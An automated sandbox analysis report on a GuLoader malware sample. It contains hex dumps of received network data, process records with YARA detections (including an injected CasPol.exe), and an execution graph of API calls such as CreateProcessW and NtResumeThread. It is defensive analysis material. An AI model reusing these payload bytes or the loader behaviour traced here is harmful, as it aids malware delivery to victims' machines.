                                                                        2022-11-03 06:22:07 UTC153INData Raw: 5d a1 cb 3f dc 95 4b 92 2a 7e 0e 68 be 97 fe c8 23 ae c0 e1 e3 c7 31 bb db af bb 5c 35 59 1c b9 47 16 65 9b df 0f 7a 53 85 c4 84 56 62 bd 14 ff e2 bf be d6 26 77 ee 3d 35 58 12 f9 b7 cf df 63 fa ad 2a b0 ba fb e8 eb 07 95 54 e9 5e 2a ce 30 75 64 1d aa fc d7 aa ec 56 e9 49 f6 6f fa ec 06 66 aa 77 b8 a7 7d 3b 4b 90 ee de ca f3 31 f6 02 c2 eb f5 97 e1 df 88 0a d5 fa ae 4e 2e 63 0a 6f 9c 90 67 c0 a2 99 a6 26 d0 2e b1 5f c2 4b a1 42 8a 12 fd 75 e7 a7 7f 71 9c 10 2d 5d fd 07 c3 5e 5f 48 c7 f8 a3 10 46 e6 f3 77 63 64 c2 e7 a6 db e8 22 c8 c7 df 00 1d 3d 91 b5 bf 9a 42 fb a7 9e c3 f9 77 b4 e1 fa b9 b9 64 1a 56 17 e8 a9 13 7b 3d 23 53 b2 6a 06 15 1c c7 d2 3b c6 b3 44 e3 5f b0 8c 07 7f 9c 1b 2f 62 5b 01 eb 93 67 c8 0c 82 6f dd d9 90 b2 ab 4d 7d f5 ee 37 00 53 30 e8
                                                                        Data Ascii: ]?K*~h#1\5YGezSVb&w=5Xc*T^*0udVIofw};K1N.cog&._KBuq-]^_HFwcd"=BwdV{=#Sj;D_/b[goM}7S0
                                                                        2022-11-03 06:22:07 UTC154INData Raw: a7 f7 b0 e7 32 ea 26 5e 99 0c 58 de 23 53 a1 d3 3a 82 e2 9c 7f 61 a1 5f 13 ab 59 68 86 d6 db bd 10 c4 6a 5b b0 90 5c b6 76 2f 5d fc 93 37 39 f8 31 7e 06 0d 42 b9 c7 2b e3 e8 ca 49 56 58 be c4 62 23 db d1 a1 cf f9 a3 19 75 07 dc 79 45 07 74 e0 7a 37 68 e1 a7 25 93 e3 d3 78 b4 3a c5 56 3d 83 fc 5f 19 4a ff 28 47 ed 43 f5 42 a0 c6 1e 69 a5 ad 28 18 18 a2 a5 f8 22 7e 33 db b8 4b 74 04 15 33 44 bf 39 a8 9f 1f 22 a4 62 46 ee e2 bf 84 99 2a d3 fa 3c 89 d4 25 8d ab 9f 33 36 0d 53 11 a7 40 39 e9 53 e7 23 00 c8 a6 06 b6 ac da b2 c9 04 44 9d d8 e6 49 1f 61 b9 65 61 f8 49 5d b1 72 ad ba 08 77 23 f6 40 55 08 0d 47 3f 2e 7c 48 fe 58 1d e3 1d a6 09 c2 eb c9 14 de 65 e7 6d 59 0b 1b ae c0 5b ab eb d2 76 7f 6b f6 11 0c dd 1a 20 21 60 98 f8 b5 b2 0c 19 8c 8d 89 85 7b e2 91
                                                                        Data Ascii: #>YDD)\82<l;Ux:/s/zvCT|f oz2qR=L4!R@w2JO!h2(W5E\RF}LKI(O[brd"ku,P4H,}-|C+08B WOvALYgHWf~N
                                                                        2022-11-03 06:22:07 UTC196INData Raw: b9 1b 04 b7 6a 7f 9e 94 29 dd b8 53 65 2a 67 23 30 28 0d ce 83 bb 00 dd a3 74 18 ee 08 7e ec e6 49 b5 20 c2 80 12 2f 44 22 69 81 3b cb 20 09 80 74 2a 16 f0 b6 75 22 e4 91 d2 a3 3e f7 4e 77 3c eb 10 63 0b e1 33 a5 72 e5 ac 64 df 15 d0 b8 8a 9d e4 49 55 4c 62 c2 01 0b 76 9b 11 e9 9d 1c f4 2d 5a e1 1a c8 c8 d4 1d d5 e7 9f 3f cb ec b1 8c 5d 32 7d df fc ab 7d f4 29 a5 87 cb 66 7e e3 ff 8d 44 b5 d8 e4 ef b8 ef dc 60 02 f1 41 65 33 c2 88 b7 8c 5b 4f 82 1d a0 6c 73 f1 79 32 f1 1c 37 7d 46 5d 1d 9f 2c 6b 4d df 08 3d cc 35 a3 7c 94 9a 46 55 20 a1 13 23 ed e9 a4 44 c8 84 dd 25 91 e5 e3 d5 63 dd 07 7e d5 2a 17 ce bf 87 1d ca a3 97 ab 1d cf 35 e8 7f 39 ce 05 93 f7 40 d1 26 15 32 4d be 29 82 0a 92 84 4f 3a a1 db 52 96 72 ea 1b 5e f5 9b 69 c2 91 95 9d 09 b9 85 04 8b fa
                                                                        Data Ascii: j)Se*g#0(t~I /D"i; t*u">Nw<c3rdIULbv-Z?]2}})f~D`Ae3[Olsy27}F],kM=5|FU #D%c~*59@&2M)O:Rr^i
                                                                        2022-11-03 06:22:07 UTC197INData Raw: 5d 3a 3f 10 71 34 e7 2b b8 ba ab 18 96 81 1c 70 a5 a7 1a 49 9d c9 65 49 fa 36 f2 83 5c 0f 60 9d 21 89 a0 37 21 06 14 6f 22 5d d1 cc b7 21 70 e1 31 2c 2a 0a 9b 64 91 87 91 e4 53 68 1d 8b 23 57 aa 78 51 4c 01 ee f1 35 46 de 78 29 9b 0d f7 83 7e 20 93 13 23 ae 8a 46 1b 3f 3a 62 dd 0a 47 86 7d c1 76 f3 ef 64 a8 69 49 60 de a4 3c 16 01 98 9b 79 1c d6 ac 2d e0 8f 4e fa bd 26 1d db 8c 3b cc aa 7c 78 d7 93 bc f6 64 c5 b2 01 e6 89 03 97 5a 2c a2 12 97 3e 17 94 0b 74 4f 7a 28 0b 19 16 4c da 73 87 c4 f5 e6 54 97 ac 9b dc 06 60 8c af b0 06 a0 44 27 19 46 72 ff 21 4b 30 0f 1b 2d 34 6e 3c 49 c2 0c 6f 81 b9 88 20 7d a8 81 be 49 5a 95 dd 23 80 47 c1 0e 00 59 05 bd a7 82 7b c8 99 96 e2 09 fc df 3a 65 ff bb da a4 fc 3f bf 96 9d 6f 59 ae 8c b9 a9 39 f4 0d 27 e1 79 ff 78 ff
                                                                        Data Ascii: ]:?q4+pIeI6\`!7!o"]!p1,*dSh#WxQL5Fx)~ #F?:bG}vdiI`<y-N&;|xdZ,>tOz(LsT`D'Fr!K0-4n<Io }IZ#GY{:e?oY9'yx
                                                                        2022-11-03 06:22:07 UTC198INData Raw: 41 5a 07 ac 12 00 5f fd d3 9b 83 2b 51 a7 78 e9 49 75 f8 01 f9 d6 01 71 29 7e f8 d9 3d 73 b9 b6 0c 89 70 95 d8 ee 84 fc 96 a8 09 9e 78 f5 ff a0 eb 60 d0 7d 31 11 16 77 75 d5 25 35 c1 98 76 a5 34 67 d8 ad c6 ef dc 3c ef 33 3a 15 51 c2 ba fc fa 8a 5c f3 59 d4 df f4 44 ee ff 52 72 bd 7e aa 28 bb 5c b8 e1 e8 63 52 02 3a 07 8d 6f d1 15 5b 96 56 13 72 38 13 33 14 bb de 60 ee 4d f0 b6 f7 2d ca 07 02 6c 9b 8c 34 4d 0a 8c c3 e4 f1 84 8d dd a6 13 11 00 34 5e 67 ab f0 de 45 80 a5 5b c9 9c 5c ec 74 2b da f8 8d 53 09 bd 22 8e 35 7a 6e ad b8 d4 77 9f 06 5c d1 e4 ff a7 1f ef 0f 20 fe 22 56 92 9e 24 bd c3 d2 17 0d a5 e7 97 4f 5f 33 13 70 d4 89 63 6f 72 c1 b9 b8 f2 1c 93 d1 5b 16 9e 7c ef ab 1b 88 e1 9b 8f 4b 8d 0a 2a dd 66 da 1c 01 e4 35 e5 c6 15 d6 3d 21 69 b3 9d 32 0d
                                                                        Data Ascii: AZ_+QxIuq)~=spx`}1wu%5v4g<3:Q\YDRr~(\cR:o[Vr83`M-l4M4^gE[\t+S"5znw\ "V$O_3pcor[|K*f5=!i2
                                                                        2022-11-03 06:22:07 UTC200INData Raw: f9 91 43 4e b7 38 7b 92 cd 4c 17 4a 25 ec cf 51 b3 ea e1 f9 99 c3 dd 57 d7 35 54 da f1 50 a8 43 9e 3c 57 10 03 f9 68 b8 9c 00 92 e8 d6 ef 3b 5a 99 be cb a1 93 f7 a0 6e 6d dc 6e 0c e0 c8 b5 38 c6 e1 b7 18 ac e3 0e 3d b3 dd a5 2e 17 58 6b 12 ad 61 7b 7b e9 b1 f8 a9 45 8b 73 49 94 98 33 97 8d f4 96 43 8b 35 98 98 0b a3 15 bb b6 3e 38 95 6d 06 c7 01 32 d8 2e 02 ca 72 6d 01 9f 6c 62 5e b7 5a 1d 05 4e af 66 47 11 a8 c6 f8 63 26 9d 41 b2 00 b1 60 37 4d 4b 9b 76 56 e2 78 81 de 92 8d 99 d2 6f f0 da db 39 2a 07 fe 61 7b 08 88 ee 1a 24 e3 3a ac 85 f4 b8 28 94 db 7d 42 14 86 f4 40 b9 8f db cb d6 67 e4 8e e5 e0 60 0e 55 aa be 51 aa 46 ec 7e 75 ad 5f 95 da b2 ef ef 4b 95 2f f1 9c 40 d6 a7 dc 25 8c d5 c5 34 f3 a6 0b d3 11 52 5f 07 15 2d 84 fb a2 d1 c6 45 f4 fc 5e 9d e7
                                                                        Data Ascii: CN8{LJ%QW5TPC<Wh;Znmn8=.Xka{{EsI3C5>8m2.rmlb^ZNfGc&A`7MKvVxo9*a{$:(}B@g`UQF~u_K/@%4R_-E^
                                                                        2022-11-03 06:22:07 UTC201INData Raw: da dc 19 eb ef 0a dc 0e c3 65 71 64 ca d8 1c 1a 94 c9 1f fe 8f 8a 2b 6a af 33 b9 b5 29 7e 89 09 89 c4 f8 0c 18 19 ca 45 d4 73 33 6d 18 8b 10 ed 5e c9 ab 52 c2 33 f7 ad fb 24 de 99 85 0d fb 70 42 b1 65 b9 33 a8 db 5b 26 02 bf f1 5d f2 31 16 6e 29 28 dd f2 81 41 f1 32 74 7e 8f 88 6c cf eb 50 c8 12 d3 d4 d7 97 ba 72 49 1e ac d9 d2 ad 1c 42 17 73 e2 85 41 be 6e b2 60 c4 40 89 80 76 af ec dc 23 46 4a de b3 f6 7a 01 ed 71 13 eb e1 97 11 89 19 83 e7 ca 52 55 5f 88 16 22 b8 3f 59 50 38 5e 58 bc 31 42 6b 6c f2 48 3c c3 db a0 b1 38 61 d5 7e 45 f4 6e 53 93 41 06 7f 06 7b a8 69 1c a1 d1 bc 36 22 93 f3 13 c9 8c f9 93 3d a8 af 09 84 2d 8c 86 3c d7 76 c4 b3 27 83 0e 6f 36 6d 5e 11 9d 93 1d 12 c4 7c db 1e df fe fe 2e 45 c1 0d 74 25 cb 83 31 b6 41 d9 59 93 a0 29 54 d6 a0
                                                                        Data Ascii: eqd+j3)~Es3m^R3$pBe3[&]1n)(A2t~lPrIBsAn`@v#FJzqRU_"?YP8^X1BklH<8a~EnSA{i6"=-<v'o6m^|.Et%1AY)T
                                                                        2022-11-03 06:22:07 UTC202INData Raw: 42 44 72 4b 01 52 64 84 5a 0e e0 c8 5e 1c c7 63 58 66 cb 57 be 10 fa fc d0 5d 02 64 f5 a5 9b eb e1 6e 11 c8 5a 1d 28 fc 30 a5 da 8b 22 1a b1 26 05 5e 5c ac 4c b4 b4 58 0e 64 0f 15 51 36 78 3a 8f 0e 0f 55 ff db 1a 11 56 cb 22 c1 81 e1 ca 44 f9 75 8b 13 54 be 85 ae 01 d6 4a c3 ff 8d 7d d7 82 75 9a 98 31 05 da c4 9e c7 6e f8 5e ee 44 6b c0 c5 97 02 2b fb c9 73 17 57 51 1b 8f a9 e2 41 a8 61 09 e4 eb f9 f6 4f 39 82 99 d6 a3 f4 96 5b 58 e5 0d 40 9c 5e c3 73 80 15 96 b8 ea 90 bb 46 dc ed 4e 90 af 48 40 1d 12 a1 5c f8 4f ab 34 5d eb bb 19 ca de cf c2 75 1a c5 3a 25 27 2d b9 ee c0 40 db e9 bc 78 10 17 ef f0 0d a3 74 c3 2f a4 67 48 f9 7b c6 4d 8d 00 9d 60 bd 7a 99 ac b3 e4 9f 55 f4 8a 2d bc bb 48 8f 43 b1 56 4f bf e3 83 c3 50 a2 ac 79 95 e8 c9 30 4d 2e 13 ad 43 f9
                                                                        Data Ascii: BDrKRdZ^cXfW]dnZ(0"&^\LXdQ6x:UV"DuTJ}u1n^Dk+sWQAaO9[X@^sFNH@\O4]u:%'-@xt/gH{M`zU-HCVOPy0M.C
                                                                        2022-11-03 06:22:07 UTC203INData Raw: 64 dd a8 2d ca 40 ce 65 55 b8 a5 76 14 33 a7 e4 74 5a 64 d0 99 b8 d7 63 c6 c7 bc 02 8f a1 96 a5 55 6a 10 e1 40 70 95 96 30 c6 78 7a d4 83 55 e2 a6 dc 71 63 b6 30 23 90 35 7d d0 de e4 ab 15 e7 37 54 17 c7 7d 6a 28 34 75 c6 1e f6 a9 82 0e 08 d8 e4 fd 12 37 99 64 84 47 b3 81 cd 74 59 e3 97 f3 db 32 00 50 6d b3 2b 4a ea 9d 30 8e 09 29 cc ff 47 81 e0 81 c7 af 95 70 bf d8 af d0 dc 32 3f e6 3d fe 2c 22 71 83 01 4b 27 41 36 56 e0 d2 9b 45 7e fd c4 f5 6d 69 b8 b1 37 8c c2 f1 d9 90 fd 8e 1e 53 01 b0 98 80 41 8d 87 0c f6 70 9c 68 69 47 99 d4 e4 6d a3 5a 11 d3 be f1 33 67 03 ae de 57 a3 31 1f ef 1e 41 33 87 d0 d6 e3 d3 6a 92 a5 fb 34 2a 16 bf 5a a6 55 5e bb df 8d 0c 6f 86 69 b0 3b 3e 59 90 66 d3 2e e6 88 5c 44 82 bc 55 ef a3 52 42 64 ec dd 69 df 7c 83 96 36 13 d4 c1
                                                                        Data Ascii: d-@eUv3tZdcUj@p0xzUqc0#5}7T}j(4u7dGtY2Pm+J0)Gp2?=,"qK'A6VE~mi7SAphiGmZ3gW1A3j4*ZU^oi;>Yf.\DURBdi|6
                                                                        2022-11-03 06:22:07 UTC204INData Raw: 2d 42 46 91 d9 3e 4a b8 fc 86 f3 c9 c9 de ae 90 41 fa 63 b2 9b 99 68 82 96 be cb 6a 92 a0 ae d7 df 37 f3 8b 2b c6 73 6e 6d 83 b9 1b 9a be 9d c4 85 4c 4f 4e 47 cb 48 45 ba 71 36 f7 07 6a 14 0d 4e 7c a8 42 98 1f a1 a9 49 57 5a fb 9d e2 1e 65 63 7d 47 96 63 a7 ea 3e e4 72 4c cb 6f 1e 36 ad f2 1a 9c 6d 96 6b 0f 05 cf 43 d4 6f 3f 77 46 a7 15 71 cb 09 e1 87 7e af 3c 89 19 05 8e 6f 24 01 79 32 85 9f f5 2d b4 77 5d ed 73 aa 64 06 07 85 57 7c c2 df 5c 3b 2c 7f 4c df bb c5 e4 2f b4 e4 1c b2 9f a0 70 69 1d b1 57 a2 6f 5f a1 10 79 93 55 5a 9e 8b 57 8d 71 b9 ea b2 d1 41 70 59 bf ab 77 26 74 71 f1 3b ca c2 b6 d9 a9 d9 21 0d 34 9a fe 6d a0 e3 e2 10 2c f3 1d a6 49 97 7b 94 d3 28 22 50 d9 c0 54 5d ee de d8 3b 56 16 be 2e 13 17 1a 2b 96 bd cc 08 e2 0a 11 68 a6 b3 ce 24 7c
                                                                        Data Ascii: -BF>JAchj7+snmLONGHEq6jN|BIWZec}Gc>rLo6mkCo?wFq~<o$y2-w]sdW|\;,L/piWo_yUZWqApYw&tq;!4m,I{("PT];V.+h$|
                                                                        2022-11-03 06:22:07 UTC206INData Raw: df 82 6d f2 00 a8 f5 63 94 7f 93 4e 9c 25 87 74 80 08 33 c3 2f 60 ef bc 00 ed 27 01 75 7f 7f 07 9d e2 26 e2 cf da af 10 17 a3 b3 a0 fc 41 7d ec a4 f3 86 a0 03 91 f5 ab a5 50 36 49 47 62 ba 59 e2 34 28 ce 01 ba 13 45 d3 0c 3a 98 e0 9a 82 e8 c4 f9 d4 1a ab 23 67 35 b7 d1 3b 67 6c b7 e5 31 71 f6 7a 3b 9f a0 d6 8c b6 0b cb ee 85 2a 7e a6 01 b9 ac be 04 1c 58 90 b2 74 d0 9a ea f5 7a aa 7b f0 f5 a9 55 fc 62 2b 58 6a 63 fa 36 aa 5c 63 bd 69 52 c6 09 2f 1d 07 a5 cc 81 ee 09 67 0a 99 a4 6d 08 7c 74 be b5 c2 7f 03 9b 0f e3 35 90 dc df 19 2e 46 9e 50 ae eb 33 25 03 9e ce 97 ca 84 bc e7 e2 f0 ae 0d 4e fb b5 fe 92 8d 8a e5 da 39 f0 19 66 64 32 2e 5d f2 4a 87 74 87 e0 9c 64 79 4a 32 1d 94 df af d9 8a f0 39 7d 69 01 ef c5 2d 54 08 ce aa 6c fc fd 47 ab 25 71 6c f2 fa 61
                                                                        Data Ascii: mcN%t3/`'u&A}P6IGbY4(E:#g5;gl1qz;*~Xtz{Ub+Xjc6\ciR/gm|t5.FP3%N9fd2.]JtdyJ29}i-TlG%qla
                                                                        2022-11-03 06:22:07 UTC207INData Raw: c0 43 73 02 20 e0 c4 06 2a c6 e9 8a 66 bf cf b2 51 b2 5f 5b 19 82 a5 d5 ef e0 14 6b d2 fe 71 be d7 f1 eb dc db 2e af 62 2d 14 64 29 57 9a a5 0c 9c 3c f0 a1 ee 44 8f ca 8c f3 7c 9d de 67 6f 4d 57 bb 23 a7 0c f6 05 63 c6 39 5f 27 52 c9 21 26 1a 03 04 9a 52 8a 58 80 a1 f9 f4 e8 fc e9 b1 e7 96 f5 c1 f5 33 f3 2d 54 f7 08 14 53 a8 9b e4 41 69 72 21 e9 0f 60 c3 c0 16 60 3f f9 ea 03 45 1a 1e 3a 65 26 ae 1a 1c a3 56 18 84 ec 76 a8 9c d9 8d c9 9d 8f c7 29 fd 90 db 9b e8 8e c0 1f 90 51 b9 a9 d1 98 ef 0d d7 6b 58 26 bb 17 a4 5f 9f 00 e9 ca e1 f5 a3 c0 87 1f 47 da d5 af 25 05 d7 2b 68 ab 59 5c d0 bd 9c 63 1c a5 24 a7 ad f7 8b bb 68 35 f8 0e f7 ed c5 21 c3 bd ce bb 30 52 07 b3 d5 32 be 8b 2c bc 16 e6 19 79 eb 19 19 da 3f 16 b4 1c c8 4c 0d de db b3 ec c2 dd 45 f1 91 7a
                                                                        Data Ascii: Cs *fQ_[kq.b-d)W<D|goMW#c9_'R!&RX3-TSAir!``?E:e&Vv)QkX&_G%+hY\c$h5!0R2,y?LEz



                                                                        Target ID:1
                                                                        Start time:07:21:23
                                                                        Start date:03/11/2022
                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
                                                                        Imagebase:0x400000
                                                                        File size:531480 bytes
                                                                        MD5 hash:5F570885A22CF0A74CA454EA710BCD2E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000001.00000002.29264931081.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        Target ID:10
                                                                        Start time:07:21:43
                                                                        Start date:03/11/2022
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
                                                                        Imagebase:0xcb0000
                                                                        File size:106496 bytes
                                                                        MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000000.29011621997.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate

                                                                        Target ID:11
                                                                        Start time:07:21:44
                                                                        Start date:03/11/2022
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff61a470000
                                                                        File size:875008 bytes
                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high


                                                                          Execution Graph

                                                                          Execution Coverage:8.3%
                                                                          Dynamic/Decrypted Code Coverage:24.2%
                                                                          Signature Coverage:29.1%
                                                                          Total number of Nodes:1390
                                                                          Total number of Limit Nodes:103
13758->13853 13760 402f38 GetFileSize 13761 403034 13760->13761 13779 402f4f 13760->13779 13854 402e5d 13761->13854 13763 40303d 13765 40306d GlobalAlloc 13763->13765 13763->13773 13866 40332b SetFilePointer 13763->13866 13764 403315 ReadFile 13764->13779 13865 40332b SetFilePointer 13765->13865 13768 4030a0 13770 402e5d 6 API calls 13768->13770 13769 403088 13772 4030fa 31 API calls 13769->13772 13770->13773 13771 403056 13774 403315 ReadFile 13771->13774 13777 403094 13772->13777 13773->13679 13776 403061 13774->13776 13775 402e5d 6 API calls 13775->13779 13776->13765 13776->13773 13777->13773 13777->13777 13778 4030d1 SetFilePointer 13777->13778 13778->13773 13779->13761 13779->13764 13779->13768 13779->13773 13779->13775 13781 40665c 5 API calls 13780->13781 13782 4039a4 13781->13782 13783 4039aa GetUserDefaultUILanguage 13782->13783 13784 4039bc 13782->13784 13867 4061c9 wsprintfW 13783->13867 13786 406150 3 API calls 13784->13786 13788 4039ec 13786->13788 13787 4039ba 13868 403c66 13787->13868 13789 403a0b lstrcatW 13788->13789 13790 406150 3 API calls 13788->13790 13789->13787 13790->13789 13793 405c5b 18 API calls 13794 403a3d 13793->13794 13795 403ad1 13794->13795 13797 406150 3 API calls 13794->13797 13796 405c5b 18 API calls 13795->13796 13799 403ad7 13796->13799 13800 403a6f 13797->13800 13798 403ae7 LoadImageW 13802 403b8d 13798->13802 13803 403b0e RegisterClassW 13798->13803 13799->13798 13801 4062a4 17 API calls 13799->13801 13800->13795 13806 403a90 lstrlenW 13800->13806 13810 405b80 CharNextW 13800->13810 13801->13798 13805 40140b 2 API calls 13802->13805 13804 403b44 SystemParametersInfoW CreateWindowExW 13803->13804 13835 403b97 13803->13835 13804->13802 13809 403b93 13805->13809 13807 403ac4 13806->13807 13808 403a9e lstrcmpiW 13806->13808 13812 405b53 3 API calls 13807->13812 13808->13807 13811 403aae GetFileAttributesW 13808->13811 13815 403c66 18 API calls 13809->13815 13809->13835 13813 403a8d 13810->13813 13814 403aba 13811->13814 13816 
403aca 13812->13816 13813->13806 13814->13807 13817 405b9f 2 API calls 13814->13817 13818 403ba4 13815->13818 13876 406282 lstrcpynW 13816->13876 13817->13807 13820 403bb0 ShowWindow 13818->13820 13821 403c33 13818->13821 13823 4065ec 3 API calls 13820->13823 13822 4053b9 5 API calls 13821->13822 13824 403c39 13822->13824 13825 403bc8 13823->13825 13826 403c55 13824->13826 13827 403c3d 13824->13827 13828 403bd6 GetClassInfoW 13825->13828 13830 4065ec 3 API calls 13825->13830 13829 40140b 2 API calls 13826->13829 13834 40140b 2 API calls 13827->13834 13827->13835 13831 403c00 DialogBoxParamW 13828->13831 13832 403bea GetClassInfoW RegisterClassW 13828->13832 13829->13835 13830->13828 13833 40140b 2 API calls 13831->13833 13832->13831 13833->13835 13834->13835 13835->13682 13836->13687 13837->13720 13838->13683 13840 4038c0 CloseHandle 13839->13840 13841 4038ce 13839->13841 13840->13841 13881 4038fb 13841->13881 13844 405990 67 API calls 13845 4036e9 OleUninitialize 13844->13845 13845->13693 13845->13694 13846->13726 13847->13737 13849 401389 2 API calls 13848->13849 13850 401420 13849->13850 13850->13697 13851->13754 13852->13756 13853->13760 13855 402e66 13854->13855 13856 402e7e 13854->13856 13857 402e76 13855->13857 13858 402e6f DestroyWindow 13855->13858 13859 402e86 13856->13859 13860 402e8e GetTickCount 13856->13860 13857->13763 13858->13857 13861 406698 2 API calls 13859->13861 13862 402e9c CreateDialogParamW ShowWindow 13860->13862 13863 402ebf 13860->13863 13864 402e8c 13861->13864 13862->13863 13863->13763 13864->13763 13865->13769 13866->13771 13867->13787 13869 403c7a 13868->13869 13877 4061c9 wsprintfW 13869->13877 13871 403ceb 13878 403d1f 13871->13878 13873 403a1b 13873->13793 13874 403cf0 13874->13873 13875 4062a4 17 API calls 13874->13875 13875->13874 13876->13795 13877->13871 13879 4062a4 17 API calls 13878->13879 13880 403d2d SetWindowTextW 13879->13880 13880->13874 13882 403909 13881->13882 13883 40390e FreeLibrary GlobalFree 13882->13883 13884 
4038d3 13882->13884 13883->13883 13883->13884 13884->13844 13885 40167b 13886 402c37 17 API calls 13885->13886 13887 401682 13886->13887 13888 402c37 17 API calls 13887->13888 13889 40168b 13888->13889 13890 402c37 17 API calls 13889->13890 13891 401694 MoveFileW 13890->13891 13892 4016a7 13891->13892 13898 4016a0 13891->13898 13894 4065c5 2 API calls 13892->13894 13895 40224a 13892->13895 13893 401423 24 API calls 13893->13895 13896 4016b6 13894->13896 13896->13895 13897 406048 36 API calls 13896->13897 13897->13898 13898->13893 14251 2b66c8d 14255 2b66c8f 14251->14255 14252 2b62511 14253 2b62338 EnumWindows 14252->14253 14254 2b62516 14253->14254 14255->14252 14256 2b821bc 2 API calls 14255->14256 14257 2b66d8f 14256->14257 14257->14252 14258 2b66dac 14257->14258 14259 2b821bc 2 API calls 14258->14259 14260 2b66e9a 14259->14260 14265 2b6e543 14260->14265 14263 2b66f62 14267 2b6e482 14265->14267 14266 2b80eba EnumWindows 14266->14267 14267->14265 14267->14266 14268 2b66ebd 14267->14268 14268->14263 14269 2b66f66 14268->14269 14270 2b66fa3 14269->14270 14271 2b84af7 NtResumeThread 14270->14271 14272 2b67187 14271->14272 14273 2b6757f 14272->14273 14274 2b84af7 NtResumeThread 14272->14274 14278 2b625ca 14272->14278 14279 2b6739c 14272->14279 14273->14263 14274->14279 14275 2b6755a 14275->14263 14276 2b80eba EnumWindows 14276->14278 14277 2b81c0f EnumWindows 14282 2b6754c 14277->14282 14278->14276 14283 2b625ce 14278->14283 14281 2b84af7 NtResumeThread 14279->14281 14279->14282 14280 2b811dd EnumWindows 14280->14282 14281->14282 14282->14275 14282->14277 14282->14278 14282->14280 14283->14263 15022 2b6758d 15023 2b674ed 15022->15023 15024 2b84af7 NtResumeThread 15023->15024 15025 2b675ad 15023->15025 15028 2b6754c 15024->15028 15026 2b81c0f EnumWindows 15026->15028 15027 2b811dd EnumWindows 15027->15028 15028->15026 15028->15027 15030 2b6755a 15028->15030 15031 2b625ca 15028->15031 15029 2b80eba EnumWindows 15029->15031 15031->15029 15032 2b625ce 15031->15032 13899 
40247e 13900 402c77 17 API calls 13899->13900 13901 402488 13900->13901 13902 402c37 17 API calls 13901->13902 13903 402491 13902->13903 13904 40249c RegQueryValueExW 13903->13904 13908 402885 13903->13908 13905 4024bc 13904->13905 13909 4024c2 RegCloseKey 13904->13909 13905->13909 13910 4061c9 wsprintfW 13905->13910 13909->13908 13910->13909 12758 401f00 12773 402c37 12758->12773 12765 401f39 CloseHandle 12769 402885 12765->12769 12768 401f2b 12770 401f30 12768->12770 12771 401f3b 12768->12771 12798 4061c9 wsprintfW 12770->12798 12771->12765 12774 402c43 12773->12774 12799 4062a4 12774->12799 12777 401f06 12779 4052e6 12777->12779 12780 405301 12779->12780 12789 401f10 12779->12789 12781 40531d lstrlenW 12780->12781 12784 4062a4 17 API calls 12780->12784 12782 405346 12781->12782 12783 40532b lstrlenW 12781->12783 12786 405359 12782->12786 12787 40534c SetWindowTextW 12782->12787 12785 40533d lstrcatW 12783->12785 12783->12789 12784->12781 12785->12782 12788 40535f SendMessageW SendMessageW SendMessageW 12786->12788 12786->12789 12787->12786 12788->12789 12790 405867 CreateProcessW 12789->12790 12791 401f16 12790->12791 12792 40589a CloseHandle 12790->12792 12791->12765 12791->12769 12793 40670d WaitForSingleObject 12791->12793 12792->12791 12794 406727 12793->12794 12795 406739 GetExitCodeProcess 12794->12795 12841 406698 12794->12841 12795->12768 12798->12765 12813 4062b1 12799->12813 12800 4064fc 12801 402c64 12800->12801 12832 406282 lstrcpynW 12800->12832 12801->12777 12816 406516 12801->12816 12803 4064ca lstrlenW 12803->12813 12804 4062a4 10 API calls 12804->12803 12807 4063df GetSystemDirectoryW 12807->12813 12809 4063f2 GetWindowsDirectoryW 12809->12813 12810 406516 5 API calls 12810->12813 12811 40646d lstrcatW 12811->12813 12812 406426 SHGetSpecialFolderLocation 12812->12813 12815 40643e SHGetPathFromIDListW CoTaskMemFree 12812->12815 12813->12800 12813->12803 12813->12804 12813->12807 12813->12809 12813->12810 12813->12811 12813->12812 12814 4062a4 10 
API calls 12813->12814 12825 406150 12813->12825 12830 4061c9 wsprintfW 12813->12830 12831 406282 lstrcpynW 12813->12831 12814->12813 12815->12813 12822 406523 12816->12822 12817 40659e CharPrevW 12818 406599 12817->12818 12818->12817 12821 4065bf 12818->12821 12819 40658c CharNextW 12819->12818 12819->12822 12821->12777 12822->12818 12822->12819 12823 406578 CharNextW 12822->12823 12824 406587 CharNextW 12822->12824 12837 405b80 12822->12837 12823->12822 12824->12819 12833 4060ef 12825->12833 12828 406184 RegQueryValueExW RegCloseKey 12829 4061b4 12828->12829 12829->12813 12830->12813 12831->12813 12832->12801 12834 4060fe 12833->12834 12835 406102 12834->12835 12836 406107 RegOpenKeyExW 12834->12836 12835->12828 12835->12829 12836->12835 12838 405b86 12837->12838 12839 405b9c 12838->12839 12840 405b8d CharNextW 12838->12840 12839->12822 12840->12838 12842 4066b5 PeekMessageW 12841->12842 12843 4066c5 WaitForSingleObject 12842->12843 12844 4066ab DispatchMessageW 12842->12844 12843->12794 12844->12842 13106 402306 13107 402314 13106->13107 13108 40230e 